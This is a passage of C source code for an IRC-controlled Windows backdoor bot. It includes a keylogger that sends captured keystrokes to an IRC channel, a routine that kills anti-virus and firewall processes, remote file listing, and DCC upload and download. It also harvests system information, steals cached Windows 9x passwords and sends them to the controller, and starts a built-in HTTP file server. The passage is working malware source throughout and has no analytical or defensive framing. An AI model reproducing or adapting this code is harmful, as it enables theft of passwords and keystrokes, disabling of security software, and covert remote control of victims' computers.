1210 		memset(date,0,sizeof(date));
1211 		GetTimeFormat(0x409,0,0," HH:mm:ss]",date,70);
1212 		fputs(date,log);
1213 		fputs(" Keylogger Started\n\n",log);
1214 		fclose(log);
1215 	}
1216 	#endif
1217 
1218 	memset(buffer,0,sizeof(buffer));
1219 	win = GetForegroundWindow();
1220 	winold = win;
1221 	GetWindowText(winold,window,60);
1222 	while (err == 0) {
1223 		Sleep(8);
1224 		win = GetForegroundWindow();
1225 		if (win != winold) {
1226 			if (strlen(buffer) != 0) {
1227 				sprintf(buffer2,"%s (Changed window",buffer);
1228 				err = sendkeys(keysock,buffer2,window,logfile);
1229 				memset(buffer,0,sizeof(buffer));
1230 				memset(buffer2,0,sizeof(buffer2));
1231 			}
1232 			win = GetForegroundWindow();
1233 			winold = win;
1234 			GetWindowText(winold,window,60);
1235 
1236 		}
1237 		for(i=0;i<92;i++)
1238 		{
1239 			shift = GetKeyState(VK_SHIFT);
1240  			x = inputL[i];
1241 			if (GetAsyncKeyState(x) & 0x8000) {
1242 				//see if capslock or shift is pressed doesnt work most of the time on win9x
1243 				if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91)))//caps lock and NOT shift
1244 					bKstate[x] = 1;//upercase a-z
1245 				else if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91)))//caps lock AND shift
1246 					bKstate[x] = 2;//lowercase a-z
1247 				else if (shift < 0) //Shift
1248 					bKstate[x] = 3; //upercase
1249 				else bKstate[x] = 4; //lowercase 
1250 			}
1251 
1252 			else {
1253 				if (bKstate[x] != 0)
1254 				{
1255 					state = bKstate[x];
1256 					bKstate[x] = 0;
1257 					if (x == 8) {
1258 						buffer[strlen(buffer)-1] = 0;
1259 						continue;
1260 					}
1261 					else if (strlen(buffer) > 550) {
1262 						win = GetForegroundWindow();
1263 						GetWindowText(win,window,60);
1264 						sprintf(buffer2,"%s (Buffer full",buffer);
1265 						err = sendkeys(keysock,buffer2,window,logfile);
1266 						memset(buffer,0,sizeof(buffer));
1267 						memset(buffer2,0,sizeof(buffer2));
1268 						continue;
1269 					}
1270 					else if (x == 13)  {
1271 						if (strlen(buffer) == 0) continue;
1272 						win = GetForegroundWindow();
1273 						GetWindowText(win,window,60);
1274 						sprintf(buffer2,"%s (Return",buffer);
1275 						err = sendkeys(keysock,buffer2,window,logfile);
1276 						memset(buffer,0,sizeof(buffer));
1277 						memset(buffer2,0,sizeof(buffer2));
1278 						continue;
1279 					}
1280 					else if (state == 1 || state == 3)
1281 						strcat(buffer,outputH[i]);
1282 					else if (state == 2 || state == 4)
1283 						strcat(buffer,outputL[i]);
1284 				}
1285 
1286      			}
1287 		}
1288 	}
1289 	threads[threadnum].id = 0;
1290 	return 1;
1291 }
1292 
1293 int sendkeys(SOCKET sock,char *buf,char *window,char *logfile)
1294 {
1295 	char buffer[4092];
1296 	strcat(buf,")\n");
1297 	#ifdef start_keylogger_afterstartup
1298 	int len = 0;
1299 	FILE *log;
1300 	log = fopen(logfile,"aw");
1301 	if (log != NULL) {
1302 		char date[20];
1303 		GetTimeFormat(0x409,0,0,"[HH:mm:ss] ",date,19);
1304 		fputs(date,log);
1305 		len = strlen(date) + strlen(window);
1306 		fputs(window,log);
1307 		len = 75 - len;
1308 		if (len > 0) {
1309 			int c;
1310 			for(c=0;c<len;c++)
1311 				fputc(32,log);
1312 
1313 		}
1314 	 	fputs(buf,log);
1315 		fclose(log);
1316 	}
1317 	if (sendkeysto == 0) return 0;
1318 	#endif
1319 
1320 	strcat(buf,"\r");
1321 	if (strlen(keylogchan) == 0) {
1322 		sprintf(buffer,"(%s) �10 %s",window,buf);
1323 	}
1324 	else {
1325 		sprintf(buffer,"PRIVMSG %s :(%s)�10  %s",keylogchan,window,buf);
1326 	}
1327 	if (send(sock,buffer,strlen(buffer),0) == SOCKET_ERROR) {
1328 		memset(keylogchan,0,sizeof(keylogchan));
1329 		sendkeysto = 0;
1330 		#ifndef start_keylogger_afterstartup
1331 		return 1;
1332 		#endif
1333 	}
1334 	return 0;
1335 }
1336 
1337 #ifdef use_funstuf 
1338 void Keyevent (BYTE key,BOOL caps)
1339 {
1340 	if (caps) keybd_event(VK_SHIFT,MapVirtualKey(VK_SHIFT,0),FALSE?KEYEVENTF_KEYUP:0,0);
1341         keybd_event(key,MapVirtualKey(key,0),FALSE?KEYEVENTF_KEYUP:0,0);
1342 	keybd_event(key,MapVirtualKey(key,0),TRUE?KEYEVENTF_KEYUP:0,0);
1343 	if (caps) keybd_event(VK_SHIFT,MapVirtualKey(VK_SHIFT,0),TRUE?KEYEVENTF_KEYUP:0,0);
1344 }
1345 #endif
1346 
1347 #ifdef Use_Firewall_killer
1348 DWORD WINAPI kill_av(LPVOID param)
1349 {
1350 	while (1)
1351 	{
1352 		listProcesses(0,NULL,NULL,TRUE);
1353 		Sleep(killer_delay);
1354 	}
1355 	return 0;
1356 }
1357 #endif
1358 int listProcesses(SOCKET sock,char *chan,char *proccess,BOOL killthread)
1359 {
1360 	HANDLE hand;
1361 	HANDLE killer;
1362 	char buffer[500];
1363  	PROCESSENTRY32 pe32 = {0};
1364 	int c;
1365 	char window[250];
1366 	if (fCreateToolhelp32Snapshot && fProcess32First && fProcess32Next) {
1367 		hand = fCreateToolhelp32Snapshot(2, 0);
1368 		if (hand != INVALID_HANDLE_VALUE) {
1369 			pe32.dwSize = sizeof(PROCESSENTRY32);
1370 			if (fProcess32First(hand, &pe32)) {
1371 				do {
1372 					if (killthread) {
1373 						#ifdef Use_Firewall_killer
1374 						CharUpperBuff(pe32.szExeFile,strlen(pe32.szExeFile));
1375 						for(c = 0;kill_list[c] != NULL;c++)
1376 						{
1377 							if (strstr(pe32.szExeFile,kill_list[c]) != NULL) {
1378  								killer=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pe32.th32ProcessID);
1379 								TerminateProcess(killer,0);
1380 								break;
1381 							}
1382 						}
1383 						#endif
1384 					}
1385 					else if (proccess == NULL) {
1386 						memset(buffer,0,sizeof(buffer));
1387 						if (chan != NULL) {
1388 							Sleep(Flood_delay);
1389 							sprintf(buffer,"PRIVMSG %s :%s\r\n",chan,pe32.szExeFile);
1390 						}
1391 						else sprintf(buffer,"%s\n\r",pe32.szExeFile);
1392 						send(sock,buffer,strlen(buffer),0);
1393 					}
1394 					else {
1395 						if (strcmp(pe32.szExeFile,proccess) == 0) {
1396  							killer = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pe32.th32ProcessID);
1397 							CloseHandle(hand);
1398 							if (!TerminateProcess(killer,0)) return 0;
1399 							return 1;
1400 						 }
1401 
1402 					}
1403 
1404 				} while (fProcess32Next(hand, &pe32));
1405 			}
1406 			CloseHandle(hand);
1407 		}
1408 	}
1409 
1410  	return 0;
1411 
1412 }
1413 
1414 
1415 int getfiles(char *current,SOCKET dccsock,char *chan,char *URL)
1416 {
1417 	char sendbuf[MAX_PATH];
1418 	char parent[MAX_PATH];
1419 	memset(parent,0,sizeof(parent));
1420         HANDLE Hnd;
1421         WIN32_FIND_DATA WFD;
1422 	DWORD c;
1423 	int count = 0;
1424 	int count2 = 0;
1425 	strtok(current,"\n");
1426 	if (chan) sprintf(sendbuf,"PRIVMSG %s :Searsing for: %s\r\n",chan,current);
1427 	else if (URL) sprintf(sendbuf,"<HTML><PRE>\n");
1428 	else sprintf(sendbuf,"Searsing for: %s\r\n",current);
1429         send(dccsock,sendbuf,strlen(sendbuf),0);
1430 	if (URL && strlen(URL) > 2) {
1431 		//make the Parent Directory
1432 		for (c=strlen(URL)-3;c != 0;c--)
1433 			if (URL[c] == 47) 
1434 				break;
1435 		strncpy(parent,URL,c+1);
1436 		sprintf(sendbuf,"<li><A href=\"%s\">Parent Directory</A></li>\r\n",parent);
1437 		send(dccsock,sendbuf,strlen(sendbuf),0);
1438 	}
1439         Hnd = FindFirstFile(current, &WFD);
1440         while (FindNextFile(Hnd, &WFD))
1441         {
1442         	if ((WFD.dwFileAttributes) &&  (strcmp(WFD.cFileName, "..") && strcmp(WFD.cFileName, ".")))
1443         	{
1444 
1445 			memset(sendbuf,0,sizeof(sendbuf));
1446 			if (WFD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
1447 				count2++;
1448 				if (chan) sprintf(sendbuf,"PRIVMSG %s :[%s]\r\n",chan,WFD.cFileName);
1449 				else if (URL) //its a http request
1450 					sprintf(sendbuf,"<li><A href=\"%s%s/\">%s</A></li> <b><u>(Directory)</b></u>\r\n",URL,WFD.cFileName,WFD.cFileName);
1451 				else
1452 					sprintf(sendbuf,"<%s>\r\n",WFD.cFileName);
1453 			}
1454 			else {
1455 				count++;
1456 				if (chan) sprintf(sendbuf,"PRIVMSG %s :%s (%i bytes)\r\n",chan,WFD.cFileName,WFD.nFileSizeLow);
1457 				else if (URL)//its a http request
1458 					sprintf(sendbuf,"<p><A href=\"%s%s\">%s</A> (%i bytes)\r\n",URL,WFD.cFileName,WFD.cFileName,WFD.nFileSizeLow);
1459 				else 
1460 					sprintf(sendbuf,"%s  (%i bytes)\r\n",WFD.cFileName,WFD.nFileSizeLow);
1461 			
1462 			}
1463 			send(dccsock,sendbuf,strlen(sendbuf),0);
1464 			if (chan) Sleep(Flood_delay);
1465      		}
1466 
1467         }
1468     	(void) FindClose(Hnd);
1469 	if (chan) sprintf(sendbuf,"PRIVMSG %s :Found %i files and %i dirs\r\n",chan,count,count2);
1470 	else if (URL) sprintf(sendbuf,"</PRE></HTML>"); 
1471 	else sprintf(sendbuf,"Found: %i files and %i dirs\r\n",count,count2);
1472 	send(dccsock,sendbuf,strlen(sendbuf),0);
1473    	return 0;
1474 }
1475 
1476 
1477 
1478 
1479 #ifdef  rawcommands_after_connect
1480 void raw_commands(SOCKET sock)
1481 {
1482 	char *p;
1483 	char buf[512];
1484 	char buf2[512];
1485 	char buf3[512];
1486 	int c;
1487 	for (c = 0;rawcommands[c] != NULL;c++) {
1488 		if (strstr(rawcommands[c], "$NICK") != NULL) {
1489 			memset(buf,0,sizeof(buf));
1490 			memset(buf2,0,sizeof(buf2));
1491 			memset(buf3,0,sizeof(buf3));
1492 			strcpy(buf,rawcommands[c]);
1493 			strcpy(buf3,buf);
1494 			strtok(buf3,"$NICK");
1495 			p = strstr(buf, "$NICK");
1496 			sprintf(buf2,"%s%s%s\n\r",buf3,nick,p+5);
1497 		}
1498 		else
1499 			sprintf(buf2,"%s\n\r",rawcommands[c]);
1500 		send(sock, buf2, strlen(buf2), 0);
1501 		Sleep(1000);
1502 	}
1503 }
1504 #endif
1505 
1506 #ifdef rawcommands_after_join
1507 void raw_commandsonjoin(SOCKET sock,char *chan)
1508 {
1509 	char *p;
1510 	char buf[512];
1511 	char buf2[512];
1512 	char buf3[512];
1513 	int c;
1514 	for (c = 0;onjoin_commands[c] != NULL;c++) {
1515 		if (strstr(onjoin_commands[c], "$CHAN") != NULL) {
1516 			memset(buf,0,sizeof(buf));
1517 			memset(buf2,0,sizeof(buf2));
1518 			memset(buf3,0,sizeof(buf3));
1519 			strcpy(buf,onjoin_commands[c]);
1520 			strcpy(buf3,buf);
1521 			strtok(buf3,"$CHAN");
1522 			p = strstr(buf, "$CHAN");
1523 			sprintf(buf2,"%s%s%s\n\r",buf3,chan,p+5);
1524 		}
1525 		else
1526 			sprintf(buf2,"%s\n\r",onjoin_commands[c]);
1527 		send(sock, buf2, strlen(buf2), 0);
1528 		Sleep(1000);
1529 	}
1530 }
1531 #endif
1532 
1533 int dccsenderror(SOCKET sock,char *chan,char *buf)
1534 {
1535 	char buffer[4096];
1536 	strcat(buf,"\n\r");
1537 	memset(buffer,0,sizeof(buffer));
1538 	if (chan) sprintf(buffer,"PRIVMSG %s :%s",chan,buf);
1539 	else sprintf(buffer,buf);
1540 	send(sock,buffer,strlen(buffer),0);
1541 	return 0;
1542 }
1543 
1544 DWORD WINAPI dcc_chat(LPVOID param)
1545 {
1546 	char buffer[4096];
1547 	char host[20];
1548 	int port;
1549 	SOCKET ircsock;
1550 	ircsock = dcchosts;
1551 	sprintf(host,dcchost);
1552 	port = dccport;
1553 	int i;
1554 	char x[MAX_PATH];
1555 	info = TRUE;
1556 	char line[4096];
1557    	SOCKET dcc;
1558 	if ((dcc = create_sock(host,port)) == SOCKET_ERROR) return 0;
1559 	while (1) {
1560 		memset(buffer,0,sizeof(buffer));
1561 		if (recv( dcc, buffer, sizeof(buffer), 0) <= 0) 
1562 			return 1;
1563 		strncpy(line, buffer, sizeof(line)-1);
1564 		strtok(buffer, " ");
1565 		strtok(buffer,"\n");
1566 		strtok(line,"\n");
1567 		if (strlen(line) < 3) continue;
1568 		if (buffer == NULL) continue;
1569 		if (read_command(dcc,ircsock,buffer,line,NULL) == 1) {
1570 			WSACleanup();
1571 			exit(0);
1572 		}
1573 
1574 	}
1575 	closesocket(dcc);
1576 	return 0;
1577 }
1578 
1579 
1580 DWORD WINAPI dcc_send(LPVOID param)
1581 {
1582 	char buffer[4096];
1583 	DWORD err, err2;
1584    	SOCKET         dcc;
1585 	SOCKET         sock;
1586 	SOCKADDR_IN    GuestAddr;
1587 	SOCKADDR_IN    SockAddr;
1588 	char chan[50];	
1589 	memset(chan,0,sizeof(chan));
1590 	strcpy(chan,sendtochan);
1591 	char filename[MAX_PATH];
1592 	SOCKET sendsock;
1593 	sendsock = dcchosts;
1594 	strcpy(filename,dccfilename);
1595 	char sendbuf[512];  
1596 	memset(sendbuf,0,sizeof(sendbuf));
1597 	info = TRUE;
1598 	FILE *infile;
1599 	while (1) 
1600 	{
1601 		if ((dcc = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
1602       			sprintf(sendbuf,Error);
1603 			break;
1604 		}
1605 		memset(&SockAddr, 0, sizeof(SockAddr));
1606    		SockAddr.sin_family = AF_INET;
1607    		SockAddr.sin_port = htons(0);//random port
1608 		SockAddr.sin_addr.s_addr = INADDR_ANY;   
1609 		if (bind(dcc, (SOCKADDR *)&SockAddr, sizeof(SockAddr)) != 0) {
1610 			sprintf(sendbuf,Error);
1611 			break;
1612 		}
1613 		int length = sizeof(SockAddr);
1614 		getsockname(dcc, (SOCKADDR *)&SockAddr, &length);
1615 
1616 		short portnum = ntohs(SockAddr.sin_port);
1617 		char file[MAX_PATH];
1618 		for (int c=0;c<=strlen(filename);c++)
1619 		{
1620 			if (filename[c] == 32) file[c] = 95;
1621 			else file[c] = filename[c];
1622 		}
1623 
1624 		if (listen(dcc, 1) != 0) {
1625 			sprintf(sendbuf,Error);
1626 			break;
1627 		}
1628 		HANDLE testfile = CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
1629 		if (testfile == INVALID_HANDLE_VALUE) {
1630 			sprintf(sendbuf,No_File);
1631 			break;
1632 		}
1633 		length = GetFileSize(testfile,NULL);
1634 		CloseHandle(testfile);
1635 		infile = fopen(filename,"rb");
1636 		if (infile == NULL) {
1637       	    		sprintf(sendbuf,No_File);
1638 			break;
1639 		}
1640 		sprintf(sendbuf,"�DCC SEND %s %i %i %i�",file,htonl(inet_addr(IP)),portnum,length);
1641 		dccsenderror(sendsock,chan,sendbuf);
1642 		TIMEVAL time;
1643    		fd_set fd_struct;
1644     		time.tv_sec = 60;//timeout after 60 sec.
1645     		time.tv_usec = 0;
1646    		FD_ZERO(&fd_struct);
1647     		FD_SET(dcc, &fd_struct);
1648 		if (select(0, &fd_struct, NULL, NULL, &time) <= 0)
1649 		{
1650 			dccsenderror(sendsock,chan,"Dcc send timeout");
1651 			break;
1652 		}
1653 		int addrlen = sizeof(GuestAddr);
1654 		if ((sock = accept(dcc, (SOCKADDR *)&GuestAddr,&addrlen)) == INVALID_SOCKET)  {
1655 			sprintf(sendbuf,Error);
1656 			break;
1657 		} 
1658 		closesocket(dcc);
1659 		int c;
1660 		int count;
1661 		while (1)
1662 		{
1663 			memset(buffer,0,sizeof(buffer));
1664 			c = fread(buffer,1,sizeof(buffer),infile);
1665 			if (c == 0) 
1666 				break;
1667 			err = send(sock,buffer ,sizeof(buffer), 0);
1668 			err2 = recv(sock,buffer ,sizeof(buffer), 0); //the client MUST send the amount of bytes recieved for now i just hope its the same as the number of bytes send 
1669 			if (err == SOCKET_ERROR || err == 0 || err2 == SOCKET_ERROR || err2 == 0) {
1670 				fclose(infile);
1671 				dccsenderror(sendsock,chan,"Socket error");
1672 				closesocket(sock);
1673 				return 1;
1674 			}
1675 			count = count + err;
1676 			
1677 		}
1678 		memset(sendbuf,0,sizeof(sendbuf));
1679 		sprintf(sendbuf,"Transfer complete (send: %i bytes)",count);
1680 		fclose(infile);
1681 		break;
1682 	}
1683 	
1684 	dccsenderror(sendsock,chan,sendbuf);
1685 	closesocket(dcc);
1686 	closesocket(sock);
1687         return 0;
1688 }
1689 
1690 DWORD WINAPI dcc_getfile(LPVOID param)
1691 {
1692 	char buffer[4096];
1693 	char sendbuffer[512];
1694 	DWORD err;
1695    	SOCKET	dcc;
1696 	SOCKET	sock;
1697 	sock = dcchosts;
1698 	char chan[50];	
1699 	if (sendtochan != NULL) strcpy(chan,sendtochan);
1700 	char host[20];
1701 	int port;
1702 	port = dccport;
1703 	int received = 0;
1704 	unsigned long received2;
1705  	sprintf(host,dcchost);
1706 	char sysdir[MAX_PATH];
1707 	char filename[MAX_PATH];
1708 	GetSystemDirectory(sysdir, sizeof(sysdir));
1709 	sprintf(filename,"%s\\%s",sysdir,dccfilename);
1710 	info = TRUE;
1711 	FILE *infile;
1712 	memset(sendbuffer,0,sizeof(sendbuffer));
1713 	while (1) 
1714 	{
1715 		HANDLE testfile = CreateFile(filename,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
1716 		if (testfile == INVALID_HANDLE_VALUE) {
1717 			sprintf(sendbuffer,"Error with file");
1718 			break;
1719 		}
1720 		CloseHandle(testfile);
1721 		infile = fopen(filename,"a+b");
1722 		if (infile == NULL) {
1723 			sprintf(sendbuffer,"Error with file");
1724 			break;
1725 		}
1726 
1727 		if ((dcc = create_sock(host,port)) == SOCKET_ERROR) {
1728 			sprintf(sendbuffer,"Error connecting");
1729 			break;
1730 		}
1731 		err = 1;
1732 		while (err != 0) {
1733 			memset(buffer,0,sizeof(buffer));
1734 			err = recv( dcc, buffer, sizeof(buffer), 0);
1735 			if (err == 0) break;
1736 			if (err == SOCKET_ERROR) {
1737 				dccsenderror(sock,chan,"Socket error");
1738 				fclose(infile);
1739 				closesocket(dcc);
1740 				return 1;
1741 			}
1742 			fwrite(buffer,1,err,infile);
1743 			received = received + err;
1744 			received2 =  htonl(received);
1745 			send(dcc,(char *)&received2 , 4, 0);
1746 		}
1747 		sprintf(sendbuffer,"Transfer complete (size: %i bytes)",received);
1748 		break;
1749 	}
1750 	dccsenderror(sock,chan,sendbuffer);
1751 	if (infile != NULL) fclose(infile);
1752 	closesocket(dcc);
1753 	return 0;
1754 
1755 }
1756 
1757 // function used for sysinfo (thanks to sdbot)
1758  char * sysinfo(char *sinfo, SOCKET sock)
1759  {
1760 	int total;
1761 	MEMORYSTATUS memstat;
1762 	OSVERSIONINFO verinfo;
1763         LPTSTR lpszSystemInfo="???";
1764         DWORD cchBuff = 256;
1765 	memstat.dwLength = sizeof(MEMORYSTATUS);
1766 	GlobalMemoryStatus(&memstat); // load memory info into memstat
1767 	verinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); // required for some strange reason
1768 	GetVersionEx(&verinfo); // load version info into verinfo
1769 	char *os;
1770 	char os2[140];
1771 	if (verinfo.dwMajorVersion == 4 && verinfo.dwMinorVersion == 0) {
1772 		if (verinfo.dwPlatformId == VER_PLATFORM_WIN32_WINDOWS) os = "95";
1773 		if (verinfo.dwPlatformId == VER_PLATFORM_WIN32_NT) os = "NT";
1774 	}
1775 	else if (verinfo.dwMajorVersion == 4 && verinfo.dwMinorVersion == 10) os = "98";
1776 	else if (verinfo.dwMajorVersion == 4 && verinfo.dwMinorVersion == 90) os = "ME";
1777 	else if (verinfo.dwMajorVersion == 5 && verinfo.dwMinorVersion == 0) os = "2000";
1778 	else if (verinfo.dwMajorVersion == 5 && verinfo.dwMinorVersion == 1) os = "XP";
1779 	else os = "???";
1780 
1781 	if (verinfo.dwPlatformId == VER_PLATFORM_WIN32_NT && verinfo.szCSDVersion[0] != '\0') {
1782 		sprintf(os2, "%s [%s]", os, verinfo.szCSDVersion);
1783 		os = os2;
1784 	}
1785 
1786 	total = GetTickCount() / 1000; 
1787 
1788         if(!GetUserName(lpszSystemInfo, &cchBuff)) lpszSystemInfo = "?";
1789       	     
1790 	HOSTENT *hostent = NULL;
1791 	IN_ADDR iaddr;
1792 	DWORD addr = inet_addr(IP);
1793 
1794 	hostent = gethostbyaddr((char *)&addr, sizeof(struct in_addr), AF_INET);
1795 	char hostname[250];
1796 	if (hostent != NULL)
1797 		sprintf(hostname,hostent->h_name);
1798 	else sprintf(hostname,"couldn't resolve host");
1799 	char sysdir[MAX_PATH];
1800 	char windir[MAX_PATH];
1801 	GetSystemDirectory(sysdir,sizeof(sysdir));
1802 	GetWindowsDirectory(windir,sizeof(windir));
1803 	char date[70];
1804 	char time[70];
1805 	GetDateFormat(0x409,0,0,"dd:MMM:yyyy",date,70);
1806 	GetTimeFormat(0x409,0,0,"HH:mm:ss",time,70);
1807 	sprintf(sinfo, "Version:%s cpu: %dMHz. ram: %dMB total, %dMB free  %d%s in use os: Windows %s (%d.%d, build %d). uptime: %dd %dh %dm. Date: %s Time: %s Current user: %s IP address: %s Hostname: %s Windir: %s\\ Systemdir: %s\\",
1808 		Bot_Version,cpuspeed(), memstat.dwTotalPhys / 1048576, memstat.dwAvailPhys / 1048576,memstat.dwMemoryLoad,"%",
1809 		os, verinfo.dwMajorVersion, verinfo.dwMinorVersion, verinfo.dwBuildNumber, total / 86400, (total % 86400) / 3600, ((total % 86400) % 3600) / 60,date , time, lpszSystemInfo,IP,hostname,windir,sysdir);
1810 
1811 	return sinfo; // return the sysinfo string
1812  }
1813 
1814 // cpu speed function (thanks to sdbot)
1815  int cpuspeed(void)
1816  {
1817 	unsigned __int64 startcycle;
1818 	unsigned __int64 speed, num, num2;
1819 
1820 	do {
1821 		startcycle = cyclecount();
1822 		Sleep(1000);
1823 		//  speed = ((cyclecount()-startcycle)/100000)/10;
1824 		speed = (cyclecount() - startcycle) / 1000000; // FIXED
1825 
1826 	} while (speed > 1000000); 
1827 	return speed;
1828  }
1829 
1830 // asm for cpuspeed() (used for counting cpu cycles) (thanks to sdbot)
1831  unsigned __int64 cyclecount(void)
1832  {
1833 	unsigned __int64 count = 0;
1834 	_asm ("rdtsc\n"
1835 		  "mov %eax,%count\n");
1836 	return count;
1837 
1838  }
1839 
1840 
1841 //get passwords only win 9x ( i think i found this source on http://www.planet-source-code.com/ but im not sure)
1842 
1843 struct PASSWORD_CACHE_ENTRY {
1844 	WORD cbEntry;
1845 	WORD cbResource;
1846 	WORD cbPassword;
1847 	BYTE iEntry;
1848 	BYTE nType;
1849 	char abResource[1];
1850 };
1851 
1852 typedef BOOL (FAR PASCAL *CACHECALLBACK)( struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData );
1853 
1854 DWORD APIENTRY WNetEnumCachedPasswords(LPSTR pbPrefix,WORD cbPrefix,BYTE nType,CACHECALLBACK pfnCallback,DWORD dwRefData);
1855 
1856 typedef DWORD (WINAPI *ENUMPASSWORD)(LPSTR pbPrefix, WORD  cbPrefix, BYTE  nType, CACHECALLBACK pfnCallback, DWORD dwRefData);
1857 
1858 ENUMPASSWORD pWNetEnumCachedPasswords;
1859 
1860 typedef struct {
1861 	char *pBuffer;
1862 	int nBufLen;
1863 	int nBufPos;
1864 } PASSCACHECALLBACK_DATA;
1865 
1866 BOOL PASCAL AddPass(struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData)
1867 {
1868 	char buff[1024],buff2[1024];
1869 	int nCount;
1870 	PASSCACHECALLBACK_DATA *dat;
1871 	dat = (PASSCACHECALLBACK_DATA *)dwRefData;
1872 	nCount=pce->cbResource;
1873 	if(nCount>1023) nCount=1023;
1874 	lstrcpyn(buff, pce->abResource, nCount+1);
1875 	buff[nCount] = 0;
1876 	CharToOem(buff, buff2);
1877 	if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
1878 	lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
1879 	dat->nBufPos+=lstrlen(buff2)+1;
1880 
1881 	nCount=pce->cbPassword;
1882 	if(nCount>1023) nCount=1023;
1883 	lstrcpyn(buff, pce->abResource+pce->cbResource, nCount+1);
1884 	buff[nCount] = 0;
1885 	CharToOem(buff, buff2);
1886 	if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
1887 	lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
1888 	dat->nBufPos+=lstrlen(buff2)+1;
1889 
1890 	return TRUE;
1891 }
1892 int cashedpasswords(SOCKET sock,char *sendto)
1893 {
1894 	char sendbuf[2150];
1895 	char start[] = "Searsing for passwords";
1896 	HMODULE hLib=LoadLibrary("MPR.DLL");
1897 
1898 	PASSCACHECALLBACK_DATA dat;
1899 	dat.pBuffer=(char *)malloc(65536);
1900 	dat.nBufLen=65536;
1901 	dat.nBufPos=0;
1902 	pWNetEnumCachedPasswords = (ENUMPASSWORD)GetProcAddress(hLib, "WNetEnumCachedPasswords");
1903 	if (!pWNetEnumCachedPasswords)	{ //only win 9x!!
1904 		return 1;
1905 	}
1906 	pWNetEnumCachedPasswords(NULL, 0, 0xff, AddPass, (DWORD) &dat);
1907 	char *svStr;
1908 	svStr=dat.pBuffer;
1909 	if (sendto != NULL) sprintf(sendbuf,"PRIVMSG %s :%s\n\r",sendto,start);
1910 	else sprintf(sendbuf,"%s\n\r",start);
1911 	send(sock,sendbuf,strlen(sendbuf), 0);
1912 	do {
1913 		char *svRsc=svStr;
1914 		svStr+=lstrlen(svStr)+1;
1915 		char *svPwd=svStr;
1916 		svStr+=lstrlen(svStr)+1;
1917 		memset(sendbuf,0,sizeof(sendbuf));
1918 		if (sendto != NULL) sprintf(sendbuf,"PRIVMSG %s :%s %s\n\r",sendto, svRsc, svPwd);
1919 		else sprintf(sendbuf,"%s %s\n\r", svRsc, svPwd);
1920 		send(sock,sendbuf,strlen(sendbuf), 0);
1921 		if (sendto != NULL) Sleep(Flood_delay);
1922 	}while(*svStr!='\0');
1923 	FreeLibrary(hLib);
1924 	return 0;
1925 };
1926 
1927 
1928 
1929 ////////////////http server ////////////////////////////////////////////////////
1930 
1931 
1932 
1933 int HTTP_server(char *dir,int http_poort)
1934 {
1935 	DWORD id;
1936 	int c;
1937 	char buf[250];
1938 	HANDLE handle;
1939 	SOCKET HTTPServer;
1940 	char httpsDir[MAX_PATH];
1941 	memset(httpsDir,0,sizeof(httpsDir));
1942 	if (dir[strlen(dir)-1] == 92) dir[strlen(dir)-1] = '\0';
1943 	strcpy(httpsDir,dir);
1944 	if ((HTTPServer = Listen(http_poort)) == -1)
1945 		return -1;
1946 	for (c=0;c < 40;c++)
1947 		if (threads[c].id == 0) break;
1948 	if (c > 39) {
1949 		closesocket(HTTPServer);
1950 		return -1;
1951 	}
1952 	handle = CreateThread(NULL, 0, &HTTP_server_thread, (LPVOID)c, 0, &id);
1953 	if (handle != NULL) {
1954 		sprintf(buf,"HTTP server listining on poort: %i root dir: %s\\",http_poort,httpsDir);
1955 		addthread(buf,HTTPServer,handle,3,httpsDir);
1956 
1957 	}
1958 	return c;
1959 }
1960 
1961 DWORD WINAPI HTTP_server_thread(LPVOID Param) 
1962 {
1963 	int threadnum = (int)Param;
1964 	SOCKADDR_IN  GuestAddr;
1965 	SOCKET guest;
1966 	int c, sin_size, addrlen, max, i, err, b, r;
1967 	DWORD id;
1968 	unsigned long mode = 1;
1969 	char buffer[4096];
1970 	char rBuffer[4096];
1971 	char *file_to_send;
1972 	char file[MAX_PATH];
1973 	file_to_send = "\0";
1974 	if (ioctlsocket(threads[threadnum].sock,FIONBIO,&mode) == SOCKET_ERROR) 
1975 		return 1;
1976 
1977 	fd_set master;   
1978         fd_set temp; 
1979 	FD_ZERO(&master);    
1980         FD_ZERO(&temp);
1981  	FD_SET(threads[threadnum].sock, &master);
1982 	max = threads[threadnum].sock;
1983 
1984 	while (1)
1985     	{
1986 		temp = master;
1987 		if (select(max+1, &temp, NULL, NULL, NULL) == SOCKET_ERROR) {
1988 			break;
1989            	}
1990 		for(i = 0; i <= max; i++) {
1991                 	if (FD_ISSET(i, &temp)) { //there is somthing to do 
1992                     		if (i == threads[threadnum].sock) {
1993                     			//there is a new connection request
1994                         		addrlen = sizeof(GuestAddr);
1995                         		if ((guest = accept(threads[threadnum].sock, (SOCKADDR *)&GuestAddr,&addrlen)) == INVALID_SOCKET)  
1996                             			continue; 
1997 					else {
1998                            			FD_SET(guest, &master); // add to master set
1999                             			if (guest > max)  
2000                                		 		max = guest;
2001                         		}
2002                    		} 
2003 				else {
2004     					memset(buffer,0,sizeof(buffer));
2005 					memset(rBuffer,0,sizeof(rBuffer));
2006                         		if (recv(i, buffer, sizeof(buffer), 0) <= 0) { //socket error
2007                         			closesocket(i); 
2008                             			FD_CLR(i, &master); // remove from master set
2009                        			} 
2010 					else {
2011 						memset(file,0,sizeof(file));
2012 						for (b = 0,r = 0;b < strlen(buffer);b++, r++) {
2013 							rBuffer[r] = buffer[b];
2014 							if (buffer[b] == '\n')
2015 							{  //check the request....
2016 								if (strstr(rBuffer,"GET ") != NULL && strlen(rBuffer) > 5) { //look for a GET request
2017 									file_to_send = strtok(strstr(strstr(rBuffer,"GET ")," ")," ");
2018 									strcpy(file,file_to_send);
2019 
2020 								}
